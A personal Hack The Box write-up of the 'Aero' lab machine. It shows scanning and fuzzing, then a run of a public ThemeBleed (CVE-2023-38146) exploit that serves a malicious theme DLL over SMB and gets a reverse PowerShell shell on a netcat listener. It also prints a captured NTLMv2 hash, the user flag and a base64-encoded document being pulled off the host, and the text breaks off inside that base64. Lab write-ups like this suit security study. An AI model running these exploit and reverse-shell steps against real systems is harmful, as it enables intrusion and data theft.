Skip to content

HTB Aero done

Aero

OS:

Windows

Technology:

Windows 11 theme repository

IP Address:

10.10.11.237

Open ports:

80/tcp open  http    Microsoft IIS httpd 10.0

Users and pass:

Nmap

┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Aero]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.237_nmap 10.10.11.237 ; cat 10.10.11.237_nmap.nmap | grep "tcp.*open"
[sudo] password for kali: 
Sorry, try again.
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-17 14:57 CEST
Nmap scan report for 10.10.11.237
Host is up (0.062s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: Aero Theme Hub
|_http-server-header: Microsoft-IIS/10.0

Open website: http://10.10.11.237

We can upload any file with extension *.theme or *themepack.
Website doesn’t seem to be checking the file beyond extension.
We upload fake file.

File upload succeeded. Once we test your theme it will be added to the site!

Ffuz - http://10.10.11.237

┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Aero]
└─$ ffuf -u http://10.10.11.237/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.10.11.237_ffuz -of all -e .php,.html,.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.237/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt 
 :: Output file      : 10.10.11.237_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

Home                    [Status: 200, Size: 11650, Words: 3468, Lines: 187, Duration: 125ms]
favicon.ico             [Status: 200, Size: 5430, Words: 9, Lines: 1, Duration: 50ms]
home                    [Status: 200, Size: 11650, Words: 3468, Lines: 187, Duration: 51ms]
upload                  [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 56ms]
:: Progress: [81876/81876] :: Job [1/1] :: 655 req/sec :: Duration: [0:02:11] :: Errors: 0 ::

Exploit: CVE-2023-38146 - ThemeBleed (Windows 11 Themes)

https://github.com/Jnnshschl/CVE-2023-38146

Download exploit

┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Aero]
└─$ git clone https://github.com/Jnnshschl/CVE-2023-38146.git                                                
Cloning into 'CVE-2023-38146'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 24 (delta 9), reused 21 (delta 6), pack-reused 0
Receiving objects: 100% (24/24), 843.79 KiB | 3.59 MiB/s, done.
Resolving deltas: 100% (9/9), done.

┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Aero]
└─$ cd CVE-2023-38146

Run exploit

Run exploit

┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Aero/CVE-2023-38146]
└─$ python3 themebleed.py -r 10.10.16.7 -p 4711
2024-04-18 09:47:43,067 INFO> ThemeBleed CVE-2023-38146 PoC [https://github.com/Jnnshschl]
2024-04-18 09:47:43,068 INFO> Credits to -> https://github.com/gabe-k/themebleed, impacket and cabarchive

2024-04-18 09:47:48,248 INFO> Compiled DLL: "./tb/Aero.msstyles_vrf_evil.dll"
2024-04-18 09:47:48,325 INFO> Theme generated: "evil_theme.theme"
2024-04-18 09:47:48,396 INFO> Themepack generated: "evil_theme.themepack"

2024-04-18 09:47:48,399 INFO> Remember to start netcat: rlwrap -cAr nc -lvnp 4711
2024-04-18 09:47:48,399 INFO> Starting SMB server: 10.10.16.7:445

2024-04-18 09:47:48,400 INFO> Config file parsed
2024-04-18 09:47:48,401 INFO> Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2024-04-18 09:47:48,401 INFO> Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2024-04-18 09:47:48,402 INFO> Config file parsed
2024-04-18 09:47:48,402 INFO> Config file parsed
2024-04-18 09:47:48,785 INFO> Incoming connection (10.10.11.237,55221)
2024-04-18 09:47:49,034 INFO> AUTHENTICATE_MESSAGE (AERO\sam.emerson,AERO)
2024-04-18 09:47:49,034 INFO> User AERO\sam.emerson authenticated successfully
2024-04-18 09:47:49,034 INFO> sam.emerson::AERO:aaaaaaaaaaaaaaaa:ac9d37f88d8612fcb50566bfedbf4335:010100000000000000aafbb46491da0151d9316d0b284cdf000000000100100074004c0048004b006a007500540056000300100074004c0048004b006a00750054005600020010005a005a0049004d005700610059007600040010005a005a0049004d0057006100590076000700080000aafbb46491da01060004000200000008003000300000000000000000000000002000008dfbb525c377aa13c5bce4b1ac50c67621701a362d3b58d464620f9f2ed9257e0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000
2024-04-18 09:47:49,152 INFO> Connecting Share(1:IPC$)
2024-04-18 09:47:49,254 INFO> Connecting Share(2:tb)
2024-04-18 09:47:49,303 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 7]
2024-04-18 09:47:49,544 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 5]
2024-04-18 09:47:51,025 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-04-18 09:47:51,291 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 1]
2024-04-18 09:47:53,961 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-04-18 09:47:54,199 WARNING> Stage 3/3: "Aero.msstyles_vrf.dll" [shareAccess: 5]
2024-04-18 09:47:59,889 INFO> Disconnecting Share(1:IPC$)
---
Upload evil_theme.themepack and evil_theme.themepack via website

http://10.10.11.237/home#upload

File upload succeeded. Once we test your theme it will be added to the site!
---
Start netcat

┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Aero]
└─$ rlwrap -cAr nc -lvnp 4711
listening on [any] 4711 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.237] 55222
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
aero\sam.emerson
PS C:\Windows\system32>

Whoami /all - sam.emerson

PS C:\Windows\system32> whoami /all
whoami /all

USER INFORMATION
----------------

User Name        SID                                           
================ ==============================================
aero\sam.emerson S-1-5-21-3555993375-1320373569-1431083245-1001


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

PS C:\Windows\system32>

Read flag: user.txt

PS C:\Windows\system32> cd C:\Users
cd C:\Users
PS C:\Users> dir
dir


    Directory: C:\Users


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         9/20/2023   5:15 AM                Administrator                                                        
d-----         9/18/2023   5:37 PM                aerosvc                                                              
d-----         9/18/2023   3:31 PM                DefaultAppPool                                                       
d-r---         9/18/2023   1:12 PM                Public                                                               
d-----         9/20/2023   5:08 AM                sam.emerson                                                          


PS C:\Users> cd sam.emerson\Desktop\
cd sam.emerson\Desktop\
PS C:\Users\sam.emerson\Desktop> dir
dir


    Directory: C:\Users\sam.emerson\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-ar---         4/18/2024  12:04 AM             34 user.txt                                                             


PS C:\Users\sam.emerson\Desktop> type user.txt
type user.txt
d5eac04885efde38b540afd6a03578dc
PS C:\Users\sam.emerson\Desktop>

Read file: CVE-2023-28252_Summary.pdf

Download file: CVE-2023-28252_Summary.pdf

PS C:\Users\sam.emerson\Desktop> cd ../Documents
cd ../Documents
PS C:\Users\sam.emerson\Documents> dir
dir


    Directory: C:\Users\sam.emerson\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         9/21/2023   9:18 AM          14158 CVE-2023-28252_Summary.pdf                                           
-a----         9/26/2023   1:06 PM           1113 watchdog.ps1                                                         


PS C:\Users\sam.emerson\Documents> [convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))
[convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))
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